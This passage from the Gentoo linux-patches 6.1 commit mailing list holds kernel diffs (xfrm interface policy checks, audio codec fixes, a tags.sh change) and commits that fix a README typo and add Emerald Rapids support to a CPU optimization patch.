++	if (sp && (sp->len || sp->olen) &&
++	    !xfrm_policy_check(NULL, XFRM_POLICY_IN, skb, family))
++		goto discard;
++
++	XFRM_SPI_SKB_CB(skb)->family = family;
++	if (family == AF_INET) {
++		XFRM_SPI_SKB_CB(skb)->daddroff = offsetof(struct iphdr, daddr);
++		XFRM_TUNNEL_SKB_CB(skb)->tunnel.ip4 = NULL;
++	} else {
++		XFRM_SPI_SKB_CB(skb)->daddroff = offsetof(struct ipv6hdr, daddr);
++		XFRM_TUNNEL_SKB_CB(skb)->tunnel.ip6 = NULL;
++	}
++
++	return xfrm_input(skb, nexthdr, spi, encap_type);
++discard:
++	kfree_skb(skb);
++	return 0;
++}
++
++static int xfrmi4_rcv(struct sk_buff *skb)
++{
++	return xfrmi_input(skb, ip_hdr(skb)->protocol, 0, 0, AF_INET);
++}
++
++static int xfrmi6_rcv(struct sk_buff *skb)
++{
++	return xfrmi_input(skb, skb_network_header(skb)[IP6CB(skb)->nhoff],
++			   0, 0, AF_INET6);
++}
++
++static int xfrmi4_input(struct sk_buff *skb, int nexthdr, __be32 spi, int encap_type)
++{
++	return xfrmi_input(skb, nexthdr, spi, encap_type, AF_INET);
++}
++
++static int xfrmi6_input(struct sk_buff *skb, int nexthdr, __be32 spi, int encap_type)
++{
++	return xfrmi_input(skb, nexthdr, spi, encap_type, AF_INET6);
++}
++
+ static int xfrmi_rcv_cb(struct sk_buff *skb, int err)
+ {
+ 	const struct xfrm_mode *inner_mode;
+@@ -937,8 +983,8 @@ static struct pernet_operations xfrmi_net_ops = {
+ };
+ 
+ static struct xfrm6_protocol xfrmi_esp6_protocol __read_mostly = {
+-	.handler	=	xfrm6_rcv,
+-	.input_handler	=	xfrm_input,
++	.handler	=	xfrmi6_rcv,
++	.input_handler	=	xfrmi6_input,
+ 	.cb_handler	=	xfrmi_rcv_cb,
+ 	.err_handler	=	xfrmi6_err,
+ 	.priority	=	10,
+@@ -988,8 +1034,8 @@ static struct xfrm6_tunnel xfrmi_ip6ip_handler __read_mostly = {
+ #endif
+ 
+ static struct xfrm4_protocol xfrmi_esp4_protocol __read_mostly = {
+-	.handler	=	xfrm4_rcv,
+-	.input_handler	=	xfrm_input,
++	.handler	=	xfrmi4_rcv,
++	.input_handler	=	xfrmi4_input,
+ 	.cb_handler	=	xfrmi_rcv_cb,
+ 	.err_handler	=	xfrmi4_err,
+ 	.priority	=	10,
+diff --git a/net/xfrm/xfrm_policy.c b/net/xfrm/xfrm_policy.c
+index 52538d5360673..7f49dab3b6b59 100644
+--- a/net/xfrm/xfrm_policy.c
++++ b/net/xfrm/xfrm_policy.c
+@@ -3670,6 +3670,9 @@ int __xfrm_policy_check(struct sock *sk, int dir, struct sk_buff *skb,
+ 			goto reject;
+ 		}
+ 
++		if (if_id)
++			secpath_reset(skb);
++
+ 		xfrm_pols_put(pols, npols);
+ 		return 1;
+ 	}
+diff --git a/scripts/tags.sh b/scripts/tags.sh
+index e137cf15aae9d..0d045182c08c0 100755
+--- a/scripts/tags.sh
++++ b/scripts/tags.sh
+@@ -91,7 +91,7 @@ all_compiled_sources()
+ 	{
+ 		echo include/generated/autoconf.h
+ 		find $ignore -name "*.cmd" -exec \
+-			grep -Poh '(?(?=^source_.* \K).*|(?=^  \K\S).*(?= \\))' {} \+ |
++			sed -n -E 's/^source_.* (.*)/\1/p; s/^  (\S.*) \\/\1/p' {} \+ |
+ 		awk '!a[$0]++'
+ 	} | xargs realpath -esq $([ -z "$KBUILD_ABS_SRCTREE" ] && echo --relative-to=.) |
+ 	sort -u
+diff --git a/sound/soc/codecs/es8326.c b/sound/soc/codecs/es8326.c
+index 87c1cc16592bb..555125efd9ad3 100644
+--- a/sound/soc/codecs/es8326.c
++++ b/sound/soc/codecs/es8326.c
+@@ -729,14 +729,16 @@ static int es8326_probe(struct snd_soc_component *component)
+ 	}
+ 	dev_dbg(component->dev, "jack-pol %x", es8326->jack_pol);
+ 
+-	ret = device_property_read_u8(component->dev, "everest,interrupt-src", &es8326->jack_pol);
++	ret = device_property_read_u8(component->dev, "everest,interrupt-src",
++				      &es8326->interrupt_src);
+ 	if (ret != 0) {
+ 		dev_dbg(component->dev, "interrupt-src return %d", ret);
+ 		es8326->interrupt_src = ES8326_HP_DET_SRC_PIN9;
+ 	}
+ 	dev_dbg(component->dev, "interrupt-src %x", es8326->interrupt_src);
+ 
+-	ret = device_property_read_u8(component->dev, "everest,interrupt-clk", &es8326->jack_pol);
++	ret = device_property_read_u8(component->dev, "everest,interrupt-clk",
++				      &es8326->interrupt_clk);
+ 	if (ret != 0) {
+ 		dev_dbg(component->dev, "interrupt-clk return %d", ret);
+ 		es8326->interrupt_clk = 0x45;
+diff --git a/sound/soc/codecs/rt715-sdca-sdw.c b/sound/soc/codecs/rt715-sdca-sdw.c
+index 3f981a9e7fb67..c54ecf3e69879 100644
+--- a/sound/soc/codecs/rt715-sdca-sdw.c
++++ b/sound/soc/codecs/rt715-sdca-sdw.c
+@@ -167,7 +167,7 @@ static int rt715_sdca_read_prop(struct sdw_slave *slave)
+ 	}
+ 
+ 	/* set the timeout values */
+-	prop->clk_stop_timeout = 20;
++	prop->clk_stop_timeout = 200;
+ 
+ 	return 0;
+ }
+diff --git a/sound/soc/sof/amd/acp.c b/sound/soc/sof/amd/acp.c
+index 36966643e36ab..8afd67ba1e5a3 100644
+--- a/sound/soc/sof/amd/acp.c
++++ b/sound/soc/sof/amd/acp.c
+@@ -316,7 +316,6 @@ static irqreturn_t acp_irq_thread(int irq, void *context)
+ {
+ 	struct snd_sof_dev *sdev = context;
+ 	const struct sof_amd_acp_desc *desc = get_chip_info(sdev->pdata);
+-	unsigned int base = desc->dsp_intr_base;
+ 	unsigned int val, count = ACP_HW_SEM_RETRY_COUNT;
+ 
+ 	val = snd_sof_dsp_read(sdev, ACP_DSP_BAR, desc->ext_intr_stat);
+@@ -326,28 +325,20 @@ static irqreturn_t acp_irq_thread(int irq, void *context)
+ 		return IRQ_HANDLED;
+ 	}
+ 
+-	val = snd_sof_dsp_read(sdev, ACP_DSP_BAR, base + DSP_SW_INTR_STAT_OFFSET);
+-	if (val & ACP_DSP_TO_HOST_IRQ) {
+-		while (snd_sof_dsp_read(sdev, ACP_DSP_BAR, desc->hw_semaphore_offset)) {
+-			/* Wait until acquired HW Semaphore lock or timeout */
+-			count--;
+-			if (!count) {
+-				dev_err(sdev->dev, "%s: Failed to acquire HW lock\n", __func__);
+-				return IRQ_NONE;
+-			}
++	while (snd_sof_dsp_read(sdev, ACP_DSP_BAR, desc->hw_semaphore_offset)) {
++		/* Wait until acquired HW Semaphore lock or timeout */
++		count--;
++		if (!count) {
++			dev_err(sdev->dev, "%s: Failed to acquire HW lock\n", __func__);
++			return IRQ_NONE;
+ 		}
+-
+-		sof_ops(sdev)->irq_thread(irq, sdev);
+-		val |= ACP_DSP_TO_HOST_IRQ;
+-		snd_sof_dsp_write(sdev, ACP_DSP_BAR, base + DSP_SW_INTR_STAT_OFFSET, val);
+-
+-		/* Unlock or Release HW Semaphore */
+-		snd_sof_dsp_write(sdev, ACP_DSP_BAR, desc->hw_semaphore_offset, 0x0);
+-
+-		return IRQ_HANDLED;
+ 	}
+ 
+-	return IRQ_NONE;
++	sof_ops(sdev)->irq_thread(irq, sdev);
++	/* Unlock or Release HW Semaphore */
++	snd_sof_dsp_write(sdev, ACP_DSP_BAR, desc->hw_semaphore_offset, 0x0);
++
++	return IRQ_HANDLED;
+ };
+ 
+ static irqreturn_t acp_irq_handler(int irq, void *dev_id)
+@@ -358,8 +349,11 @@ static irqreturn_t acp_irq_handler(int irq, void *dev_id)
+ 	unsigned int val;
+ 
+ 	val = snd_sof_dsp_read(sdev, ACP_DSP_BAR, base + DSP_SW_INTR_STAT_OFFSET);
+-	if (val)
++	if (val) {
++		val |= ACP_DSP_TO_HOST_IRQ;
++		snd_sof_dsp_write(sdev, ACP_DSP_BAR, base + DSP_SW_INTR_STAT_OFFSET, val);
+ 		return IRQ_WAKE_THREAD;
++	}
+ 
+ 	return IRQ_NONE;
+ }
+diff --git a/tools/testing/selftests/drivers/net/ocelot/tc_flower_chains.sh b/tools/testing/selftests/drivers/net/ocelot/tc_flower_chains.sh
+index 9c79bbcce5a87..aff0a59f92d9a 100755
+--- a/tools/testing/selftests/drivers/net/ocelot/tc_flower_chains.sh
++++ b/tools/testing/selftests/drivers/net/ocelot/tc_flower_chains.sh
+@@ -246,7 +246,7 @@ test_vlan_ingress_modify()
+ 	bridge vlan add dev $swp2 vid 300
+ 
+ 	tc filter add dev $swp1 ingress chain $(IS1 2) pref 3 \
+-		protocol 802.1Q flower skip_sw vlan_id 200 \
++		protocol 802.1Q flower skip_sw vlan_id 200 src_mac $h1_mac \
+ 		action vlan modify id 300 \
+ 		action goto chain $(IS2 0 0)
+ 


* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-02-27 16:59 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-02-27 16:59 UTC (permalink / raw
  To: gentoo-commits

commit:     1d867d0c7f9d9b4d9082b1bc7a326c5b7e136a0c
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Mon Feb 27 16:59:22 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Mon Feb 27 16:59:22 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=1d867d0c

Fix typo in README

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/0000_README b/0000_README
index c6d94abc..aa47ca9b 100644
--- a/0000_README
+++ b/0000_README
@@ -152,7 +152,7 @@ From:   https://github.com/graysky2/kernel_compiler_patch
 Desc:   Kernel >= 5.15 patch enables gcc = v11.1+ optimizations for additional CPUs.
 
 Patch:  5020_BMQ-and-PDS-io-scheduler-v6.1-r4-linux-tkg.patch
-From:   https://github.com/Frogging-Family/linux-tkghttps://gitlab.com/alfredchen/projectc
+From:   https://github.com/Frogging-Family/linux-tkg https://gitlab.com/alfredchen/projectc
 Desc:   BMQ(BitMap Queue) Scheduler. A new CPU scheduler developed from PDS(incld). Inspired by the scheduler in zircon.
 
 Patch:  5021_BMQ-and-PDS-gentoo-defaults.patch


* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-02-26 18:24 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-02-26 18:24 UTC (permalink / raw
  To: gentoo-commits

commit:     458c4e0f9c4e70e70c669eaf74f3bb990312db59
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Sun Feb 26 18:23:44 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Sun Feb 26 18:23:44 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=458c4e0f

Update CPU Opt patch, add Emerald Rapids and update Sapphire Rapids

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 5010_enable-cpu-optimizations-universal.patch | 125 ++++++++++++++------------
 1 file changed, 69 insertions(+), 56 deletions(-)

diff --git a/5010_enable-cpu-optimizations-universal.patch b/5010_enable-cpu-optimizations-universal.patch
index 0841340b..7a1b717a 100644
--- a/5010_enable-cpu-optimizations-universal.patch
+++ b/5010_enable-cpu-optimizations-universal.patch
@@ -1,7 +1,6 @@
-From a0825feea3f100656d58446885b5f190284fd219
+From 70d4906b87983ed2ed5da78930a701625d881dd0 Mon Sep 17 00:00:00 2001
 From: graysky <therealgraysky@proton.me>
-Date: Fri, 4 Nov 2022 15:34:36 -0400
-Subject: [PATCH] more uarches for kernel 5.17+
+Date: Thu, 5 Jan 2023 14:29:37 -0500
 
 FEATURES
 This patch adds additional CPU options to the Linux kernel accessible under:
@@ -50,11 +49,12 @@ CPU-specific microarchitectures include:
 • Intel Xeon (Cascade Lake)
 • Intel Xeon (Cooper Lake)*
 • Intel 3rd Gen 10nm++ i3/i5/i7/i9-family (Tiger Lake)*
-• Intel 3rd Gen 10nm++ Xeon (Sapphire Rapids)‡
+• Intel 4th Gen 10nm++ Xeon (Sapphire Rapids)‡
 • Intel 11th Gen i3/i5/i7/i9-family (Rocket Lake)‡
 • Intel 12th Gen i3/i5/i7/i9-family (Alder Lake)‡
 • Intel 13th Gen i3/i5/i7/i9-family (Raptor Lake)§
 • Intel 14th Gen i3/i5/i7/i9-family (Meteor Lake)§
+• Intel 5th Gen 10nm++ Xeon (Emerald Rapids)§
 
 Notes: If not otherwise noted, gcc >=9.1 is required for support.
        *Requires gcc >=10.1 or clang >=10.0
@@ -99,20 +99,19 @@ REFERENCES
 3.  https://bugzilla.kernel.org/show_bug.cgi?id=77461
 4.  https://github.com/graysky2/kernel_gcc_patch/issues/15
 5.  http://www.linuxforge.net/docs/linux/linux-gcc.php
-
 ---
- arch/x86/Kconfig.cpu            | 416 ++++++++++++++++++++++++++++++--
- arch/x86/Makefile               |  43 +++-
- arch/x86/include/asm/vermagic.h |  72 ++++++
- 3 files changed, 514 insertions(+), 17 deletions(-)
+ arch/x86/Kconfig.cpu            | 427 ++++++++++++++++++++++++++++++--
+ arch/x86/Makefile               |  44 +++-
+ arch/x86/include/asm/vermagic.h |  74 ++++++
+ 3 files changed, 528 insertions(+), 17 deletions(-)
 
 diff --git a/arch/x86/Kconfig.cpu b/arch/x86/Kconfig.cpu
-index 542377cd419d..08d887d1220d 100644
+index 542377cd419d..f589971df2d3 100644
 --- a/arch/x86/Kconfig.cpu
 +++ b/arch/x86/Kconfig.cpu
 @@ -157,7 +157,7 @@ config MPENTIUM4
-
-
+ 
+ 
  config MK6
 -	bool "K6/K6-II/K6-III"
 +	bool "AMD K6/K6-II/K6-III"
@@ -121,7 +120,7 @@ index 542377cd419d..08d887d1220d 100644
  	  Select this for an AMD K6-family processor.  Enables use of
 @@ -165,7 +165,7 @@ config MK6
  	  flags to GCC.
-
+ 
  config MK7
 -	bool "Athlon/Duron/K7"
 +	bool "AMD Athlon/Duron/K7"
@@ -130,7 +129,7 @@ index 542377cd419d..08d887d1220d 100644
  	  Select this for an AMD Athlon K7-family processor.  Enables use of
 @@ -173,12 +173,106 @@ config MK7
  	  flags to GCC.
-
+ 
  config MK8
 -	bool "Opteron/Athlon64/Hammer/K8"
 +	bool "AMD Opteron/Athlon64/Hammer/K8"
@@ -138,7 +137,7 @@ index 542377cd419d..08d887d1220d 100644
  	  Select this for an AMD Opteron or Athlon64 Hammer-family processor.
  	  Enables use of some extended instructions, and passes appropriate
  	  optimization flags to GCC.
-
+ 
 +config MK8SSE3
 +	bool "AMD Opteron/Athlon64/Hammer/K8 with SSE3"
 +	help
@@ -227,7 +226,7 @@ index 542377cd419d..08d887d1220d 100644
 +
 +config MZEN4
 +	bool "AMD Zen 4"
-+	depends on (CC_IS_GCC && GCC_VERSION >= 130000) || (CC_IS_CLANG && CLANG_VERSION >= 150500)
++	depends on (CC_IS_GCC && GCC_VERSION >= 130000) || (CC_IS_CLANG && CLANG_VERSION >= 160000)
 +	help
 +	  Select this for AMD Family 19h Zen 4 processors.
 +
@@ -238,26 +237,26 @@ index 542377cd419d..08d887d1220d 100644
  	depends on X86_32
 @@ -270,7 +364,7 @@ config MPSC
  	  in /proc/cpuinfo. Family 15 is an older Xeon, Family 6 a newer one.
-
+ 
  config MCORE2
 -	bool "Core 2/newer Xeon"
 +	bool "Intel Core 2"
  	help
-
+ 
  	  Select this for Intel Core 2 and newer Core 2 Xeons (Xeon 51xx and
 @@ -278,6 +372,8 @@ config MCORE2
  	  family in /proc/cpuinfo. Newer ones have 6 and older ones 15
  	  (not a typo)
-
+ 
 +	  Enables -march=core2
 +
  config MATOM
  	bool "Intel Atom"
  	help
-@@ -287,6 +383,202 @@ config MATOM
+@@ -287,6 +383,212 @@ config MATOM
  	  accordingly optimized code. Use a recent GCC with specific Atom
  	  support in order to fully benefit from selecting this option.
-
+ 
 +config MNEHALEM
 +	bool "Intel Nehalem"
 +	select X86_P6_NOP
@@ -410,7 +409,7 @@ index 542377cd419d..08d887d1220d 100644
 +	select X86_P6_NOP
 +	help
 +
-+	  Select this for third-generation 10 nm process processors in the Sapphire Rapids family.
++	  Select this for fourth-generation 10 nm process processors in the Sapphire Rapids family.
 +
 +	  Enables -march=sapphirerapids
 +
@@ -453,14 +452,24 @@ index 542377cd419d..08d887d1220d 100644
 +	  Select this for fourteenth-generation processors in the Meteor Lake family.
 +
 +	  Enables -march=meteorlake
++
++config MEMERALDRAPIDS
++	bool "Intel Emerald Rapids"
++	depends on (CC_IS_GCC && GCC_VERSION > 130000) || (CC_IS_CLANG && CLANG_VERSION >= 150500)
++	select X86_P6_NOP
++	help
++
++	  Select this for fifth-generation 10 nm process processors in the Emerald Rapids family.
++
++	  Enables -march=emeraldrapids
 +
  config GENERIC_CPU
  	bool "Generic-x86-64"
  	depends on X86_64
-@@ -294,6 +586,50 @@ config GENERIC_CPU
+@@ -294,6 +596,50 @@ config GENERIC_CPU
  	  Generic x86-64 CPU.
  	  Run equally well on all x86-64 CPUs.
-
+ 
 +config GENERIC_CPU2
 +	bool "Generic-x86-64-v2"
 +	depends on (CC_IS_GCC && GCC_VERSION > 110000) || (CC_IS_CLANG && CLANG_VERSION >= 120000)
@@ -506,9 +515,9 @@ index 542377cd419d..08d887d1220d 100644
 +	  Enables -march=native
 +
  endchoice
-
+ 
  config X86_GENERIC
-@@ -318,9 +654,17 @@ config X86_INTERNODE_CACHE_SHIFT
+@@ -318,9 +664,17 @@ config X86_INTERNODE_CACHE_SHIFT
  config X86_L1_CACHE_SHIFT
  	int
  	default "7" if MPENTIUM4 || MPSC
@@ -519,23 +528,23 @@ index 542377cd419d..08d887d1220d 100644
 +	|| MGOLDMONT || MGOLDMONTPLUS || MSANDYBRIDGE || MIVYBRIDGE || MHASWELL || MBROADWELL \
 +	|| MSKYLAKE || MSKYLAKEX || MCANNONLAKE || MICELAKE || MCASCADELAKE || MCOOPERLAKE \
 +	|| MTIGERLAKE || MSAPPHIRERAPIDS || MROCKETLAKE || MALDERLAKE || MRAPTORLAKE || MMETEORLAKE \
-+	|| MNATIVE_INTEL || MNATIVE_AMD || X86_GENERIC || GENERIC_CPU || GENERIC_CPU2 || GENERIC_CPU3 \
-+	|| GENERIC_CPU4
++	|| MEMERALDRAPIDS || MNATIVE_INTEL || MNATIVE_AMD || X86_GENERIC || GENERIC_CPU || GENERIC_CPU2 \
++	|| GENERIC_CPU3 || GENERIC_CPU4
  	default "4" if MELAN || M486SX || M486 || MGEODEGX1
 -	default "5" if MWINCHIP3D || MWINCHIPC6 || MCRUSOE || MEFFICEON || MCYRIXIII || MK6 || MPENTIUMIII || MPENTIUMII || M686 || M586MMX || M586TSC || M586 || MVIAC3_2 || MGEODE_LX
 +	default "5" if MWINCHIP3D || MWINCHIPC6 || MCRUSOE || MEFFICEON || MCYRIXIII || MK6 || MPENTIUMIII \
 +	|| MPENTIUMII || M686 || M586MMX || M586TSC || M586 || MVIAC3_2 || MGEODE_LX
-
+ 
  config X86_F00F_BUG
  	def_bool y
-@@ -332,15 +676,27 @@ config X86_INVD_BUG
-
+@@ -332,15 +686,27 @@ config X86_INVD_BUG
+ 
  config X86_ALIGNMENT_16
  	def_bool y
 -	depends on MWINCHIP3D || MWINCHIPC6 || MCYRIXIII || MELAN || MK6 || M586MMX || M586TSC || M586 || M486SX || M486 || MVIAC3_2 || MGEODEGX1
 +	depends on MWINCHIP3D || MWINCHIPC6 || MCYRIXIII || MELAN || MK6 || M586MMX || M586TSC \
 +	|| M586 || M486SX || M486 || MVIAC3_2 || MGEODEGX1
-
+ 
  config X86_INTEL_USERCOPY
  	def_bool y
 -	depends on MPENTIUM4 || MPENTIUMM || MPENTIUMIII || MPENTIUMII || M586MMX || X86_GENERIC || MK8 || MK7 || MEFFICEON || MCORE2
@@ -543,8 +552,8 @@ index 542377cd419d..08d887d1220d 100644
 +	|| MK8 || MK7 || MEFFICEON || MCORE2 || MNEHALEM || MWESTMERE || MSILVERMONT || MGOLDMONT \
 +	|| MGOLDMONTPLUS || MSANDYBRIDGE || MIVYBRIDGE || MHASWELL || MBROADWELL || MSKYLAKE || MSKYLAKEX \
 +	|| MCANNONLAKE || MICELAKE || MCASCADELAKE || MCOOPERLAKE || MTIGERLAKE || MSAPPHIRERAPIDS \
-+	|| MROCKETLAKE || MALDERLAKE || MRAPTORLAKE || MMETEORLAKE || MNATIVE_INTEL
-
++	|| MROCKETLAKE || MALDERLAKE || MRAPTORLAKE || MMETEORLAKE || MEMERALDRAPIDS || MNATIVE_INTEL
+ 
  config X86_USE_PPRO_CHECKSUM
  	def_bool y
 -	depends on MWINCHIP3D || MWINCHIPC6 || MCYRIXIII || MK7 || MK6 || MPENTIUM4 || MPENTIUMM || MPENTIUMIII || MPENTIUMII || M686 || MK8 || MVIAC3_2 || MVIAC7 || MEFFICEON || MGEODE_LX || MCORE2 || MATOM
@@ -555,11 +564,11 @@ index 542377cd419d..08d887d1220d 100644
 +	|| MWESTMERE || MSILVERMONT || MGOLDMONT || MGOLDMONTPLUS || MSANDYBRIDGE || MIVYBRIDGE \
 +	|| MHASWELL || MBROADWELL || MSKYLAKE || MSKYLAKEX || MCANNONLAKE || MICELAKE \
 +	|| MCASCADELAKE || MCOOPERLAKE || MTIGERLAKE || MSAPPHIRERAPIDS || MROCKETLAKE \
-+	|| MALDERLAKE || MRAPTORLAKE || MMETEORLAKE || MNATIVE_INTEL || MNATIVE_AMD
-
++	|| MALDERLAKE || MRAPTORLAKE || MMETEORLAKE || MEMERALDRAPIDS || MNATIVE_INTEL || MNATIVE_AMD
+ 
  #
  # P6_NOPs are a relatively minor optimization that require a family >=
-@@ -356,32 +712,62 @@ config X86_USE_PPRO_CHECKSUM
+@@ -356,32 +722,63 @@ config X86_USE_PPRO_CHECKSUM
  config X86_P6_NOP
  	def_bool y
  	depends on X86_64
@@ -567,8 +576,9 @@ index 542377cd419d..08d887d1220d 100644
 +	depends on (MCORE2 || MPENTIUM4 || MPSC || MNEHALEM || MWESTMERE || MSILVERMONT || MGOLDMONT \
 +	|| MGOLDMONTPLUS || MSANDYBRIDGE || MIVYBRIDGE || MHASWELL || MBROADWELL || MSKYLAKE \
 +	|| MSKYLAKEX || MCANNONLAKE || MICELAKE || MCASCADELAKE || MCOOPERLAKE || MTIGERLAKE \
-+	|| MSAPPHIRERAPIDS || MROCKETLAKE || MALDERLAKE || MRAPTORLAKE || MMETEORLAKE || MNATIVE_INTEL)
-
++	|| MSAPPHIRERAPIDS || MROCKETLAKE || MALDERLAKE || MRAPTORLAKE || MMETEORLAKE || MEMERALDRAPIDS \
++	|| MNATIVE_INTEL)
+ 
  config X86_TSC
  	def_bool y
 -	depends on (MWINCHIP3D || MCRUSOE || MEFFICEON || MCYRIXIII || MK7 || MK6 || MPENTIUM4 || MPENTIUMM || MPENTIUMIII || MPENTIUMII || M686 || M586MMX || M586TSC || MK8 || MVIAC3_2 || MVIAC7 || MGEODEGX1 || MGEODE_LX || MCORE2 || MATOM) || X86_64
@@ -578,9 +588,9 @@ index 542377cd419d..08d887d1220d 100644
 +	|| MPILEDRIVER || MSTEAMROLLER || MEXCAVATOR || MZEN || MZEN2 || MZEN3 || MZEN4 || MNEHALEM \
 +	|| MWESTMERE || MSILVERMONT || MGOLDMONT || MGOLDMONTPLUS || MSANDYBRIDGE || MIVYBRIDGE || MHASWELL \
 +	|| MBROADWELL || MSKYLAKE || MSKYLAKEX || MCANNONLAKE || MICELAKE || MCASCADELAKE || MCOOPERLAKE \
-+	|| MTIGERLAKE || MSAPPHIRERAPIDS || MROCKETLAKE || MALDERLAKE || MRAPTORLAKE || MMETEORLAKE || MNATIVE_INTEL \
-+	|| MNATIVE_AMD) || X86_64
-
++	|| MTIGERLAKE || MSAPPHIRERAPIDS || MROCKETLAKE || MALDERLAKE || MRAPTORLAKE || MMETEORLAKE || MEMERALDRAPIDS \
++	|| MNATIVE_INTEL || MNATIVE_AMD) || X86_64
+ 
  config X86_CMPXCHG64
  	def_bool y
 -	depends on X86_PAE || X86_64 || MCORE2 || MPENTIUM4 || MPENTIUMM || MPENTIUMIII || MPENTIUMII || M686 || M586TSC || M586MMX || MATOM || MGEODE_LX || MGEODEGX1 || MK6 || MK7 || MK8
@@ -590,8 +600,8 @@ index 542377cd419d..08d887d1220d 100644
 +	|| MZEN2 || MZEN3 || MZEN4 || MNEHALEM || MWESTMERE || MSILVERMONT || MGOLDMONT || MGOLDMONTPLUS \
 +	|| MSANDYBRIDGE || MIVYBRIDGE || MHASWELL || MBROADWELL || MSKYLAKE || MSKYLAKEX || MCANNONLAKE \
 +	|| MICELAKE || MCASCADELAKE || MCOOPERLAKE || MTIGERLAKE || MSAPPHIRERAPIDS || MROCKETLAKE \
-+	|| MALDERLAKE || MRAPTORLAKE || MMETEORLAKE || MNATIVE_INTEL || MNATIVE_AMD
-
++	|| MALDERLAKE || MRAPTORLAKE || MMETEORLAKE || MEMERALDRAPIDS || MNATIVE_INTEL || MNATIVE_AMD
+ 
  # this should be set for all -march=.. options where the compiler
  # generates cmov.
  config X86_CMOV
@@ -603,8 +613,8 @@ index 542377cd419d..08d887d1220d 100644
 +	|| MZEN || MZEN2 || MZEN3 || MZEN4 || MNEHALEM || MWESTMERE || MSILVERMONT || MGOLDMONT \
 +	|| MGOLDMONTPLUS || MSANDYBRIDGE || MIVYBRIDGE || MHASWELL || MBROADWELL || MSKYLAKE || MSKYLAKEX \
 +	|| MCANNONLAKE || MICELAKE || MCASCADELAKE || MCOOPERLAKE || MTIGERLAKE || MSAPPHIRERAPIDS \
-+	|| MROCKETLAKE || MALDERLAKE || MRAPTORLAKE || MMETEORLAKE || MNATIVE_INTEL || MNATIVE_AMD)
-
++	|| MROCKETLAKE || MALDERLAKE || MRAPTORLAKE || MMETEORLAKE || MEMERALDRAPIDS || MNATIVE_INTEL || MNATIVE_AMD)
+ 
  config X86_MINIMUM_CPU_FAMILY
  	int
  	default "64" if X86_64
@@ -619,20 +629,20 @@ index 542377cd419d..08d887d1220d 100644
 +	|| MNATIVE_INTEL || MNATIVE_AMD)
  	default "5" if X86_32 && X86_CMPXCHG64
  	default "4"
-
+ 
  config X86_DEBUGCTLMSR
  	def_bool y
 -	depends on !(MK6 || MWINCHIPC6 || MWINCHIP3D || MCYRIXIII || M586MMX || M586TSC || M586 || M486SX || M486) && !UML
 +	depends on !(MK6 || MWINCHIPC6 || MWINCHIP3D || MCYRIXIII || M586MMX || M586TSC || M586 \
 +	|| M486SX || M486) && !UML
-
+ 
  config IA32_FEAT_CTL
  	def_bool y
 diff --git a/arch/x86/Makefile b/arch/x86/Makefile
-index bafbd905e6e7..7fae52788560 100644
+index 415a5d138de4..17b1e039d955 100644
 --- a/arch/x86/Makefile
 +++ b/arch/x86/Makefile
-@@ -150,8 +150,47 @@ else
+@@ -151,8 +151,48 @@ else
          # FIXME - should be integrated in Makefile.cpu (Makefile_32.cpu)
          cflags-$(CONFIG_MK8)		+= -march=k8
          cflags-$(CONFIG_MPSC)		+= -march=nocona
@@ -676,17 +686,18 @@ index bafbd905e6e7..7fae52788560 100644
 +        cflags-$(CONFIG_MALDERLAKE) 	+= -march=alderlake
 +        cflags-$(CONFIG_MRAPTORLAKE) 	+= -march=raptorlake
 +        cflags-$(CONFIG_MMETEORLAKE) 	+= -march=meteorlake
++        cflags-$(CONFIG_MEMERALDRAPIDS)	+= -march=emeraldrapids
 +        cflags-$(CONFIG_GENERIC_CPU2) 	+= -march=x86-64-v2
 +        cflags-$(CONFIG_GENERIC_CPU3) 	+= -march=x86-64-v3
 +        cflags-$(CONFIG_GENERIC_CPU4) 	+= -march=x86-64-v4
          cflags-$(CONFIG_GENERIC_CPU)	+= -mtune=generic
          KBUILD_CFLAGS += $(cflags-y)
-
+ 
 diff --git a/arch/x86/include/asm/vermagic.h b/arch/x86/include/asm/vermagic.h
-index 75884d2cdec3..18021e8c0c28 100644
+index 75884d2cdec3..02c1386eb653 100644
 --- a/arch/x86/include/asm/vermagic.h
 +++ b/arch/x86/include/asm/vermagic.h
-@@ -17,6 +17,52 @@
+@@ -17,6 +17,54 @@
  #define MODULE_PROC_FAMILY "586MMX "
  #elif defined CONFIG_MCORE2
  #define MODULE_PROC_FAMILY "CORE2 "
@@ -736,10 +747,12 @@ index 75884d2cdec3..18021e8c0c28 100644
 +#define MODULE_PROC_FAMILY "RAPTORLAKE "
 +#elif defined CONFIG_MMETEORLAKE
 +#define MODULE_PROC_FAMILY "METEORLAKE "
++#elif defined CONFIG_MEMERALDRAPIDS
++#define MODULE_PROC_FAMILY "EMERALDRAPIDS "
  #elif defined CONFIG_MATOM
  #define MODULE_PROC_FAMILY "ATOM "
  #elif defined CONFIG_M686
-@@ -35,6 +81,32 @@
+@@ -35,6 +83,32 @@
  #define MODULE_PROC_FAMILY "K7 "
  #elif defined CONFIG_MK8
  #define MODULE_PROC_FAMILY "K8 "
@@ -772,5 +785,5 @@ index 75884d2cdec3..18021e8c0c28 100644
  #elif defined CONFIG_MELAN
  #define MODULE_PROC_FAMILY "ELAN "
  #elif defined CONFIG_MCRUSOE
---
-2.38.1
+-- 
+2.39.0


* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-02-26 18:16 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-02-26 18:16 UTC (permalink / raw
  To: gentoo-commits

commit:     2448ffe116c8b8e53e668328ed3291d789dd7285
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Sun Feb 26 18:16:47 2023 +0000
